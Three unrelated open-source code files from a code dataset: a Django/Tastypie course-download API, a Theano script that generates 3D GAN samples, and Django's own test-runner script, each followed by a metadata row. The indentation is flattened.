import zipfile
from django.conf import settings
from django.conf.urls import url
from django.core.exceptions import MultipleObjectsReturned
from django.db.models import Q
from django.http import HttpResponse, Http404
from django.utils.translation import ugettext_lazy as _
from tastypie import fields
from tastypie.authentication import ApiKeyAuthentication, Authentication
from tastypie.authorization import ReadOnlyAuthorization, Authorization
from tastypie.resources import ModelResource
from tastypie.utils import trailing_slash
from api.serializers import CourseJSONSerializer
from oppia.models import Tracker, Course, CourseCategory
from oppia.signals import course_downloaded
STR_COURSE_NOT_FOUND = _(u"Course not found")
def get_course_from_shortname(resource, bundle, lookup):
object_list = resource.apply_filters(bundle.request,
{'shortname': lookup})
if len(object_list) <= 0:
raise resource._meta.object_class.DoesNotExist(
"Couldn't find an course with shortname '%s'." % (lookup))
elif len(object_list) > 1:
raise MultipleObjectsReturned(
"More than one course with shortname '%s'." % (lookup))
return object_list
class CourseResource(ModelResource):
class Meta:
queryset = Course.objects.all()
resource_name = 'course'
allowed_methods = ['get']
fields = ['id',
'title',
'version',
'shortname',
'priority',
'is_draft',
'description',
'author',
'username',
'organisation']
authentication = ApiKeyAuthentication()
authorization = ReadOnlyAuthorization()
serializer = CourseJSONSerializer()
always_return_data = True
include_resource_uri = True
def obj_get(self, bundle, **kwargs):
"""
        Overridden get method to perform a direct lookup if we are searching
by shortname instead of pk
"""
lookup = kwargs[self._meta.detail_uri_name]
if re.search('[a-zA-Z]', lookup):
object_list = get_course_from_shortname(self, bundle, lookup)
bundle.obj = object_list[0]
self.authorized_read_detail(object_list, bundle)
return bundle.obj
else:
return super().obj_get(bundle, **kwargs)
def get_object_list(self, request):
if request.user.is_staff:
return Course.objects.filter(is_archived=False) \
.order_by('-priority', 'title')
else:
return Course.objects.filter(is_archived=False) \
.filter(
Q(is_draft=False) |
(Q(is_draft=True) & Q(user=request.user))) \
.order_by('-priority', 'title')
def prepend_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<pk>\w[\w/-]*)/download%s$"
% (self._meta.resource_name, trailing_slash()),
self.wrap_view('download_course'), name="api_download_course"),
url(r"^(?P<resource_name>%s)/(?P<pk>\w[\w/-]*)/activity%s$"
% (self._meta.resource_name, trailing_slash()),
self.wrap_view('download_activity'),
name="api_download_activity"),
]
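    # The two patterns above expose (relative to wherever this resource is registered,
    # so treat the prefix as an example): .../course/<pk-or-shortname>/download/ handled
    # by download_course(), and .../course/<pk-or-shortname>/activity/ handled by
    # download_activity().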
def get_course(self, request, **kwargs):
self.is_authenticated(request)
self.throttle_check(request)
pk = kwargs.pop('pk', None)
try:
if request.user.is_staff:
course = self._meta.queryset.get(pk=pk, is_archived=False)
else:
course = self._meta.queryset \
.filter(
Q(is_draft=False) |
(Q(is_draft=True) & Q(user=request.user)) |
(Q(is_draft=True)
& Q(coursepermissions__user=request.user))) \
.distinct().get(pk=pk, is_archived=False)
except Course.DoesNotExist:
raise Http404(STR_COURSE_NOT_FOUND)
except ValueError:
try:
if request.user.is_staff:
course = self._meta.queryset.get(shortname=pk,
is_archived=False)
else:
course = self._meta.queryset \
.filter(
Q(is_draft=False) |
(Q(is_draft=True) & Q(user=request.user)) |
(Q(is_draft=True)
& Q(coursepermissions__user=request.user))) \
.distinct().get(shortname=pk, is_archived=False)
except Course.DoesNotExist:
raise Http404(STR_COURSE_NOT_FOUND)
return course
def download_course(self, request, **kwargs):
course = self.get_course(request, **kwargs)
file_to_download = course.getAbsPath()
has_completed_trackers = Tracker.has_completed_trackers(course,
request.user)
try:
if has_completed_trackers:
file_to_download = os.path.join(
settings.COURSE_UPLOAD_DIR,
"temp",
str(request.user.id) + "-" + course.filename)
shutil.copy2(course.getAbsPath(), file_to_download)
course_zip = zipfile.ZipFile(file_to_download, 'a')
if has_completed_trackers:
course_zip.writestr(course.shortname + "/tracker.xml",
Tracker.to_xml_string(course,
request.user))
course_zip.close()
binary_file = open(file_to_download, 'rb')
response = HttpResponse(binary_file.read(),
content_type='application/zip')
binary_file.close()
response['Content-Length'] = os.path.getsize(file_to_download)
response['Content-Disposition'] = \
'attachment; filename="%s"' % (course.filename)
except IOError:
raise Http404(STR_COURSE_NOT_FOUND)
course_downloaded.send(sender=self, course=course, request=request)
return response
def download_activity(self, request, **kwargs):
course = self.get_course(request, **kwargs)
return HttpResponse(Tracker.to_xml_string(course,
request.user),
content_type='text/xml')
def dehydrate(self, bundle):
bundle.data['url'] = bundle.request.build_absolute_uri(
bundle.data['resource_uri'] + 'download/')
        # make sure title is shown as a json object (not a string representation of one)
bundle.data['title'] = json.loads(bundle.data['title'])
try:
bundle.data['description'] = json.loads(bundle.data['description'])
except json.JSONDecodeError:
pass
course = Course.objects.get(pk=bundle.obj.pk)
if course and course.user:
bundle.data['author'] = course.user.first_name \
+ " " \
+ course.user.last_name
bundle.data['username'] = course.user.username
bundle.data['organisation'] = course.user.userprofile.organisation
return bundle
class CourseCategoryResource(ModelResource):
    course = fields.ToOneField('api.resources.course.CourseResource',
'course',
full=True)
class Meta:
queryset = CourseCategory.objects.all()
allowed_methods = ['get']
resource_name = 'coursetag'
fields = ['id', 'course', 'category']
include_resource_uri = False
authentication = ApiKeyAuthentication()
authorization = ReadOnlyAuthorization()
always_return_data = True
class CourseStructureResource(ModelResource):
class Meta:
queryset = Course.objects.filter(is_draft=False, is_archived=False)
resource_name = 'coursestructure'
allowed_methods = ['get']
fields = ['shortname',
'id',
'structure']
authentication = Authentication()
authorization = Authorization()
serializer = CourseJSONSerializer()
always_return_data = True
include_resource_uri = True
def obj_get(self, bundle, **kwargs):
"""
        Overridden get method to perform a direct lookup if we are searching
by shortname instead of pk
"""
lookup = kwargs[self._meta.detail_uri_name]
if re.search('[a-zA-Z]', lookup):
object_list = get_course_from_shortname(self, bundle, lookup)
return_obj = object_list[0]
else:
return_obj = super().obj_get(bundle, **kwargs)
# check the module.xml is on disk
path = os.path.join(settings.MEDIA_ROOT,
'courses',
return_obj.shortname,
'module.xml')
if not os.path.isfile(path):
raise self._meta.object_class.DoesNotExist()
return return_obj
def dehydrate(self, bundle):
path = os.path.join(settings.MEDIA_ROOT,
'courses',
bundle.obj.shortname,
'module.xml')
with open(path) as fd:
doc = xmltodict.parse(fd.read())
bundle.data['structure'] = json.dumps(doc)
return bundle
| gpl-3.0 | 3,532,451,220,382,889,000 | 37.103448 | 79 | 0.539769 | false |
yilei0620/3D_Conditional_Gan | GenSample_obj.py | 1 | 4544 | import sys
sys.path.append('..')
import os
import json
from time import time
import numpy as np
from sklearn.externals import joblib
import scipy
from scipy import io
# from matplotlib import pyplot as plt
# from sklearn.externals import joblib
import theano
import theano.tensor as T
from lib import activations
from lib import updates
from lib import inits
from lib.rng import py_rng, np_rng
from lib.ops import batchnorm, conv_cond_concat, conv, dropout
from lib.theano_utils import floatX, sharedX
from lib.data_utils import OneHot, shuffle, iter_data
from lib.metrics import nnc_score, nnd_score
from load import load_shapenet_train, load_shapenet_test
relu = activations.Rectify()
sigmoid = activations.Sigmoid()
lrelu = activations.LeakyRectify()
bce = T.nnet.binary_crossentropy
parameters = {'objectNumber': 2, 'Nz' : 200, 'Channel' :(1,64,128,256,512), 'kernal':(4,4,4,4), 'batchsize': 50, 'Convlayersize':(64,32,16,8,4), 'Genlrt' : 0.001, 'Discrimlrt' : 0.00001 , 'beta' : 0.5, 'l2':2.5e-5, 'Genk' : 2 , 'niter':50, 'niter_decay' : 150}
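# The loop below promotes every key of `parameters` to a module-level variable of the
# same name (e.g. Nz, Channel, batchsize) by exec'ing statements like "Nz = parameters[p]".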
for p in parameters:
tmp = p + " = parameters[p]"
exec(tmp)
# print conditional,type(batchsize),Channel[-1],kernal
gifn = inits.Normal(scale=0.02)
difn = inits.Normal(scale=0.02)
## filter_shape: (output channels, input channels, filter height, filter width, filter depth)
## load the parameters
# gen_params = [gw1, gw2, gw3, gw4, gw5, gwx]
# discrim_params = [dw1, dw2, dw3, dw4, dw5, dwy]
temp = joblib.load('models%d/50_gen_params.jl'%objectNumber)
gw1 = sharedX(temp[0])
gg1 = sharedX(temp[1])
gb1 = sharedX(temp[2])
gw2 = sharedX(temp[3])
gg2 = sharedX(temp[4])
gb2 = sharedX(temp[5])
gw3 = sharedX(temp[6])
gg3 = sharedX(temp[7])
gb3 = sharedX(temp[8])
gw4 = sharedX(temp[9])
gg4 = sharedX(temp[10])
gb4 = sharedX(temp[11])
gwx = sharedX(temp[12])
gen_params = [gw1, gg1, gb1, gw2, gg2, gb2, gw3, gg3, gb3, gw4 ,gg4, gb4, gwx]
##
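# gen() maps a latent vector Z through one fully-connected layer (reshaped to a
# Channel[-1] x 4x4x4 volume) followed by four transposed ("deconv") 3-D convolutions,
# growing the spatial size 4 -> 8 -> 16 -> 32 -> 64 per the Convlayersize settings,
# with batchnorm + ReLU on hidden layers and a sigmoid on the output voxel grid.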
def gen(Z, w1, g1, b1, w2, g2, b2, w3, g3, b3, w4, g4, b4, wx):
Gl1 = relu(batchnorm(T.dot(Z, w1), g=g1, b=b1))
Gl1 = Gl1.reshape((Gl1.shape[0],Channel[-1],Convlayersize[-1],Convlayersize[-1],Convlayersize[-1]))
input_shape = (None , None,Convlayersize[-1],Convlayersize[-1],Convlayersize[-1])
filter_shape = (Channel[-1] , Channel[-2], kernal[-1], kernal[-1], kernal[-1])
Gl2 = relu(batchnorm(conv(Gl1,w2,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'),g = g2, b = b2))
input_shape = (None , None,Convlayersize[-2],Convlayersize[-2],Convlayersize[-2])
filter_shape = (Channel[-2] , Channel[-3], kernal[-2], kernal[-2], kernal[-2])
Gl3 = relu(batchnorm(conv(Gl2,w3,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'),g = g3, b = b3))
input_shape = (None , None,Convlayersize[-3],Convlayersize[-3],Convlayersize[-3])
filter_shape = (Channel[-3] , Channel[-4], kernal[-3], kernal[-3], kernal[-3])
Gl4 = relu(batchnorm(conv(Gl3,w4,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'),g = g4, b= b4))
input_shape = (None, None, Convlayersize[-4],Convlayersize[-4],Convlayersize[-4])
filter_shape = (Channel[-4], Channel[-5], kernal[-4], kernal[-4], kernal[-4])
GlX = sigmoid(conv(Gl4,wx,filter_shape = filter_shape, input_shape = input_shape, conv_mode = 'deconv'))
return GlX
X = T.tensor5()
Z = T.matrix()
gX = gen(Z, *gen_params)
print 'COMPILING'
t = time()
# _train_g = theano.function([X, Z, Y], cost, updates=g_updates)
# _train_d = theano.function([X, Z, Y], cost, updates=d_updates)
_gen = theano.function([Z], gX)
print '%.2f seconds to compile theano functions'%(time()-t)
# trX, trY, ntrain = load_shapenet_train()
n = 10
nbatch = 10
rng = np.random.RandomState(int(time()))
# sample_ymb = floatX(np.asarray(np.eye(3)))
z_dist = scipy.io.loadmat('Z_dist_class2.mat')
z_mean = z_dist['mean']
z_mean = np.reshape(z_mean,(Nz,1))
z_std = z_dist['std']
z_std = np.reshape(z_std,(Nz,1))
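# gen_z() draws each of the Nz latent dimensions independently from a normal distribution
# whose per-dimension mean/std were loaded from Z_dist_class2.mat above.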
def gen_z(z_dist,nbatch):
ret = np.zeros((nbatch,Nz))
for j in xrange(Nz):
z_tmp = np_rng.normal(z_mean[j],z_std[j],nbatch)
ret[:,j] = z_tmp
# print ret
return ret
try:
os.mkdir('Gen_models%d'%objectNumber)
except:
pass
for j in xrange(n/nbatch):
sample_zmb = floatX(gen_z(z_dist,nbatch))
samples = np.asarray(_gen(sample_zmb))
for i in xrange(nbatch):
io.savemat('Gen_models%d/Gen_example_%d.mat'%(objectNumber,nbatch*j+i),{'instance':samples[i,:,:,:],'Z':sample_zmb[i,:]})
# niter = 1
# niter_decay = 1
| mit | 4,118,196,402,505,532,400 | 27.942675 | 261 | 0.659991 | false |
wkschwartz/django | tests/runtests.py | 2 | 23029 | #!/usr/bin/env python
import argparse
import atexit
import copy
import os
import shutil
import socket
import subprocess
import sys
import tempfile
import warnings
try:
import django
except ImportError as e:
raise RuntimeError(
'Django module not found, reference tests/README.rst for instructions.'
) from e
else:
from django.apps import apps
from django.conf import settings
from django.db import connection, connections
from django.test import TestCase, TransactionTestCase
from django.test.runner import default_test_processes
from django.test.selenium import SeleniumTestCaseBase
from django.test.utils import NullTimeKeeper, TimeKeeper, get_runner
from django.utils.deprecation import (
RemovedInDjango40Warning, RemovedInDjango41Warning,
)
from django.utils.log import DEFAULT_LOGGING
from django.utils.version import PY37
try:
import MySQLdb
except ImportError:
pass
else:
# Ignore informational warnings from QuerySet.explain().
warnings.filterwarnings('ignore', r'\(1003, *', category=MySQLdb.Warning)
# Make deprecation warnings errors to ensure no usage of deprecated features.
warnings.simplefilter("error", RemovedInDjango40Warning)
warnings.simplefilter('error', RemovedInDjango41Warning)
# Make resource and runtime warning errors to ensure no usage of error prone
# patterns.
warnings.simplefilter("error", ResourceWarning)
warnings.simplefilter("error", RuntimeWarning)
# Ignore known warnings in test dependencies.
warnings.filterwarnings("ignore", "'U' mode is deprecated", DeprecationWarning, module='docutils.io')
# RemovedInDjango41Warning: Ignore MemcachedCache deprecation warning.
warnings.filterwarnings(
'ignore',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
RUNTESTS_DIR = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_DIR = os.path.join(RUNTESTS_DIR, 'templates')
# Create a specific subdirectory for the duration of the test suite.
TMPDIR = tempfile.mkdtemp(prefix='django_')
# Set the TMPDIR environment variable in addition to tempfile.tempdir
# so that children processes inherit it.
tempfile.tempdir = os.environ['TMPDIR'] = TMPDIR
# Removing the temporary TMPDIR.
atexit.register(shutil.rmtree, TMPDIR)
SUBDIRS_TO_SKIP = [
'data',
'import_error_package',
'test_runner_apps',
]
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.staticfiles',
]
ALWAYS_MIDDLEWARE = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
]
# Need to add the associated contrib app to INSTALLED_APPS in some cases to
# avoid "RuntimeError: Model class X doesn't declare an explicit app_label
# and isn't in an application in INSTALLED_APPS."
CONTRIB_TESTS_TO_APPS = {
'deprecation': ['django.contrib.flatpages', 'django.contrib.redirects'],
'flatpages_tests': ['django.contrib.flatpages'],
'redirects_tests': ['django.contrib.redirects'],
}
def get_test_modules():
modules = []
discovery_paths = [(None, RUNTESTS_DIR)]
if connection.features.gis_enabled:
# GIS tests are in nested apps
discovery_paths.append(('gis_tests', os.path.join(RUNTESTS_DIR, 'gis_tests')))
else:
SUBDIRS_TO_SKIP.append('gis_tests')
for modpath, dirpath in discovery_paths:
for f in os.scandir(dirpath):
if ('.' not in f.name and
os.path.basename(f.name) not in SUBDIRS_TO_SKIP and
not f.is_file() and
os.path.exists(os.path.join(f.path, '__init__.py'))):
modules.append((modpath, f.name))
return modules
def get_installed():
return [app_config.name for app_config in apps.get_app_configs()]
def setup(verbosity, test_labels, parallel, start_at, start_after):
# Reduce the given test labels to just the app module path.
test_labels_set = set()
for label in test_labels:
bits = label.split('.')[:1]
test_labels_set.add('.'.join(bits))
if verbosity >= 1:
msg = "Testing against Django installed in '%s'" % os.path.dirname(django.__file__)
max_parallel = default_test_processes() if parallel == 0 else parallel
if max_parallel > 1:
msg += " with up to %d processes" % max_parallel
print(msg)
# Force declaring available_apps in TransactionTestCase for faster tests.
def no_available_apps(self):
raise Exception("Please define available_apps in TransactionTestCase "
"and its subclasses.")
TransactionTestCase.available_apps = property(no_available_apps)
TestCase.available_apps = None
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATES': settings.TEMPLATES,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
'MIDDLEWARE': settings.MIDDLEWARE,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TMPDIR, 'static')
settings.TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
}]
settings.LANGUAGE_CODE = 'en'
settings.SITE_ID = 1
settings.MIDDLEWARE = ALWAYS_MIDDLEWARE
settings.MIGRATION_MODULES = {
# This lets us skip creating migrations for the test models as many of
# them depend on one of the following contrib applications.
'auth': None,
'contenttypes': None,
'sessions': None,
}
log_config = copy.deepcopy(DEFAULT_LOGGING)
# Filter out non-error logging so we don't have to capture it in lots of
# tests.
log_config['loggers']['django']['level'] = 'ERROR'
settings.LOGGING = log_config
settings.SILENCED_SYSTEM_CHECKS = [
'fields.W342', # ForeignKey(unique=True) -> OneToOneField
'fields.W903', # NullBooleanField deprecated.
]
# Load all the ALWAYS_INSTALLED_APPS.
django.setup()
# It would be nice to put this validation earlier but it must come after
# django.setup() so that connection.features.gis_enabled can be accessed
# without raising AppRegistryNotReady when running gis_tests in isolation
# on some backends (e.g. PostGIS).
if 'gis_tests' in test_labels_set and not connection.features.gis_enabled:
print('Aborting: A GIS database backend is required to run gis_tests.')
sys.exit(1)
def _module_match_label(module_label, label):
# Exact or ancestor match.
return module_label == label or module_label.startswith(label + '.')
# Load all the test model apps.
test_modules = get_test_modules()
found_start = not (start_at or start_after)
installed_app_names = set(get_installed())
for modpath, module_name in test_modules:
if modpath:
module_label = modpath + '.' + module_name
else:
module_label = module_name
if not found_start:
if start_at and _module_match_label(module_label, start_at):
found_start = True
elif start_after and _module_match_label(module_label, start_after):
found_start = True
continue
else:
continue
# if the module (or an ancestor) was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to INSTALLED_APPS.
module_found_in_labels = not test_labels or any(
_module_match_label(module_label, label) for label in test_labels_set
)
if module_name in CONTRIB_TESTS_TO_APPS and module_found_in_labels:
for contrib_app in CONTRIB_TESTS_TO_APPS[module_name]:
if contrib_app not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS.append(contrib_app)
if module_found_in_labels and module_label not in installed_app_names:
if verbosity >= 2:
print("Importing application %s" % module_name)
settings.INSTALLED_APPS.append(module_label)
# Add contrib.gis to INSTALLED_APPS if needed (rather than requiring
# @override_settings(INSTALLED_APPS=...) on all test cases.
gis = 'django.contrib.gis'
if connection.features.gis_enabled and gis not in settings.INSTALLED_APPS:
if verbosity >= 2:
print("Importing application %s" % gis)
settings.INSTALLED_APPS.append(gis)
apps.set_installed_apps(settings.INSTALLED_APPS)
# Set an environment variable that other code may consult to see if
# Django's own test suite is running.
os.environ['RUNNING_DJANGOS_TEST_SUITE'] = 'true'
return state
def teardown(state):
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
# Discard the multiprocessing.util finalizer that tries to remove a
# temporary directory that's already removed by this script's
# atexit.register(shutil.rmtree, TMPDIR) handler. Prevents
# FileNotFoundError at the end of a test run (#27890).
from multiprocessing.util import _finalizer_registry
_finalizer_registry.pop((-100, 0), None)
del os.environ['RUNNING_DJANGOS_TEST_SUITE']
def actual_test_processes(parallel):
if parallel == 0:
# This doesn't work before django.setup() on some databases.
if all(conn.features.can_clone_databases for conn in connections.all()):
return default_test_processes()
else:
return 1
else:
return parallel
class ActionSelenium(argparse.Action):
"""
Validate the comma-separated list of requested browsers.
"""
def __call__(self, parser, namespace, values, option_string=None):
browsers = values.split(',')
for browser in browsers:
try:
SeleniumTestCaseBase.import_webdriver(browser)
except ImportError:
raise argparse.ArgumentError(self, "Selenium browser specification '%s' is not valid." % browser)
setattr(namespace, self.dest, browsers)
def django_tests(verbosity, interactive, failfast, keepdb, reverse,
test_labels, debug_sql, parallel, tags, exclude_tags,
test_name_patterns, start_at, start_after, pdb, buffer,
timing):
state = setup(verbosity, test_labels, parallel, start_at, start_after)
# Run the test suite, including the extra validation tests.
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(
verbosity=verbosity,
interactive=interactive,
failfast=failfast,
keepdb=keepdb,
reverse=reverse,
debug_sql=debug_sql,
parallel=actual_test_processes(parallel),
tags=tags,
exclude_tags=exclude_tags,
test_name_patterns=test_name_patterns,
pdb=pdb,
buffer=buffer,
timing=timing,
)
failures = test_runner.run_tests(test_labels or get_installed())
teardown(state)
return failures
def get_subprocess_args(options):
subprocess_args = [
sys.executable, __file__, '--settings=%s' % options.settings
]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
if options.tags:
subprocess_args.append('--tag=%s' % options.tags)
if options.exclude_tags:
subprocess_args.append('--exclude_tag=%s' % options.exclude_tags)
return subprocess_args
def bisect_tests(bisection_label, options, test_labels, parallel, start_at, start_after):
state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
test_labels = test_labels or get_installed()
print('***** Bisecting test suite: %s' % ' '.join(test_labels))
# Make sure the bisection point isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [bisection_label, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = get_subprocess_args(options)
iteration = 1
while len(test_labels) > 1:
midpoint = len(test_labels) // 2
test_labels_a = test_labels[:midpoint] + [bisection_label]
test_labels_b = test_labels[midpoint:] + [bisection_label]
print('***** Pass %da: Running the first half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_a))
failures_a = subprocess.run(subprocess_args + test_labels_a)
print('***** Pass %db: Running the second half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_b))
print('')
failures_b = subprocess.run(subprocess_args + test_labels_b)
if failures_a.returncode and not failures_b.returncode:
print("***** Problem found in first half. Bisecting again...")
iteration += 1
test_labels = test_labels_a[:-1]
elif failures_b.returncode and not failures_a.returncode:
print("***** Problem found in second half. Bisecting again...")
iteration += 1
test_labels = test_labels_b[:-1]
elif failures_a.returncode and failures_b.returncode:
print("***** Multiple sources of failure found")
break
else:
print("***** No source of failure found... try pair execution (--pair)")
break
if len(test_labels) == 1:
print("***** Source of error: %s" % test_labels[0])
teardown(state)
def paired_tests(paired_test, options, test_labels, parallel, start_at, start_after):
state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
test_labels = test_labels or get_installed()
print('***** Trying paired execution')
# Make sure the constant member of the pair isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [paired_test, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = get_subprocess_args(options)
for i, label in enumerate(test_labels):
print('***** %d of %d: Check test pairing with %s' % (
i + 1, len(test_labels), label))
failures = subprocess.call(subprocess_args + [label, paired_test])
if failures:
print('***** Found problem pair with %s' % label)
return
print('***** No problem pair found')
teardown(state)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run the Django test suite.")
parser.add_argument(
'modules', nargs='*', metavar='module',
help='Optional path(s) to test modules; e.g. "i18n" or '
'"i18n.tests.TranslationTests.test_lazy_objects".',
)
parser.add_argument(
'-v', '--verbosity', default=1, type=int, choices=[0, 1, 2, 3],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output',
)
parser.add_argument(
'--noinput', action='store_false', dest='interactive',
help='Tells Django to NOT prompt the user for input of any kind.',
)
parser.add_argument(
'--failfast', action='store_true',
help='Tells Django to stop running the test suite after first failed test.',
)
parser.add_argument(
'--keepdb', action='store_true',
help='Tells Django to preserve the test database between runs.',
)
parser.add_argument(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, either the DJANGO_SETTINGS_MODULE '
'environment variable or "test_sqlite" will be used.',
)
parser.add_argument(
'--bisect',
help='Bisect the test suite to discover a test that causes a test '
'failure when combined with the named test.',
)
parser.add_argument(
'--pair',
help='Run the test suite in pairs with the named test to find problem pairs.',
)
parser.add_argument(
'--reverse', action='store_true',
help='Sort test suites and test cases in opposite order to debug '
'test side effects not apparent with normal execution lineup.',
)
parser.add_argument(
'--selenium', action=ActionSelenium, metavar='BROWSERS',
help='A comma-separated list of browsers to run the Selenium tests against.',
)
parser.add_argument(
'--headless', action='store_true',
help='Run selenium tests in headless mode, if the browser supports the option.',
)
parser.add_argument(
'--selenium-hub',
help='A URL for a selenium hub instance to use in combination with --selenium.',
)
parser.add_argument(
'--external-host', default=socket.gethostname(),
help='The external host that can be reached by the selenium hub instance when running Selenium '
'tests via Selenium Hub.',
)
parser.add_argument(
'--debug-sql', action='store_true',
help='Turn on the SQL query logger within tests.',
)
parser.add_argument(
'--parallel', nargs='?', default=0, type=int,
const=default_test_processes(), metavar='N',
help='Run tests using up to N parallel processes.',
)
parser.add_argument(
'--tag', dest='tags', action='append',
help='Run only tests with the specified tags. Can be used multiple times.',
)
parser.add_argument(
'--exclude-tag', dest='exclude_tags', action='append',
help='Do not run tests with the specified tag. Can be used multiple times.',
)
parser.add_argument(
'--start-after', dest='start_after',
help='Run tests starting after the specified top-level module.',
)
parser.add_argument(
'--start-at', dest='start_at',
help='Run tests starting at the specified top-level module.',
)
parser.add_argument(
'--pdb', action='store_true',
help='Runs the PDB debugger on error or failure.'
)
parser.add_argument(
'-b', '--buffer', action='store_true',
help='Discard output of passing tests.',
)
parser.add_argument(
'--timing', action='store_true',
help='Output timings, including database set up and total run time.',
)
if PY37:
parser.add_argument(
'-k', dest='test_name_patterns', action='append',
help=(
'Only run test methods and classes matching test name pattern. '
'Same as unittest -k option. Can be used multiple times.'
),
)
options = parser.parse_args()
using_selenium_hub = options.selenium and options.selenium_hub
if options.selenium_hub and not options.selenium:
parser.error('--selenium-hub and --external-host require --selenium to be used.')
if using_selenium_hub and not options.external_host:
parser.error('--selenium-hub and --external-host must be used together.')
# Allow including a trailing slash on app_labels for tab completion convenience
options.modules = [os.path.normpath(labels) for labels in options.modules]
mutually_exclusive_options = [options.start_at, options.start_after, options.modules]
enabled_module_options = [bool(option) for option in mutually_exclusive_options].count(True)
if enabled_module_options > 1:
print('Aborting: --start-at, --start-after, and test labels are mutually exclusive.')
sys.exit(1)
for opt_name in ['start_at', 'start_after']:
opt_val = getattr(options, opt_name)
if opt_val:
if '.' in opt_val:
print('Aborting: --%s must be a top-level module.' % opt_name.replace('_', '-'))
sys.exit(1)
setattr(options, opt_name, os.path.normpath(opt_val))
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
else:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_sqlite')
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.selenium:
if not options.tags:
options.tags = ['selenium']
elif 'selenium' not in options.tags:
options.tags.append('selenium')
if options.selenium_hub:
SeleniumTestCaseBase.selenium_hub = options.selenium_hub
SeleniumTestCaseBase.external_host = options.external_host
SeleniumTestCaseBase.headless = options.headless
SeleniumTestCaseBase.browsers = options.selenium
if options.bisect:
bisect_tests(
options.bisect, options, options.modules, options.parallel,
options.start_at, options.start_after,
)
elif options.pair:
paired_tests(
options.pair, options, options.modules, options.parallel,
options.start_at, options.start_after,
)
else:
time_keeper = TimeKeeper() if options.timing else NullTimeKeeper()
with time_keeper.timed('Total run'):
failures = django_tests(
options.verbosity, options.interactive, options.failfast,
options.keepdb, options.reverse, options.modules,
options.debug_sql, options.parallel, options.tags,
options.exclude_tags,
getattr(options, 'test_name_patterns', None),
options.start_at, options.start_after, options.pdb, options.buffer,
options.timing,
)
time_keeper.print_results()
if failures:
sys.exit(1)
| bsd-3-clause | -6,603,682,544,696,628,000 | 37.510033 | 113 | 0.642755 | false |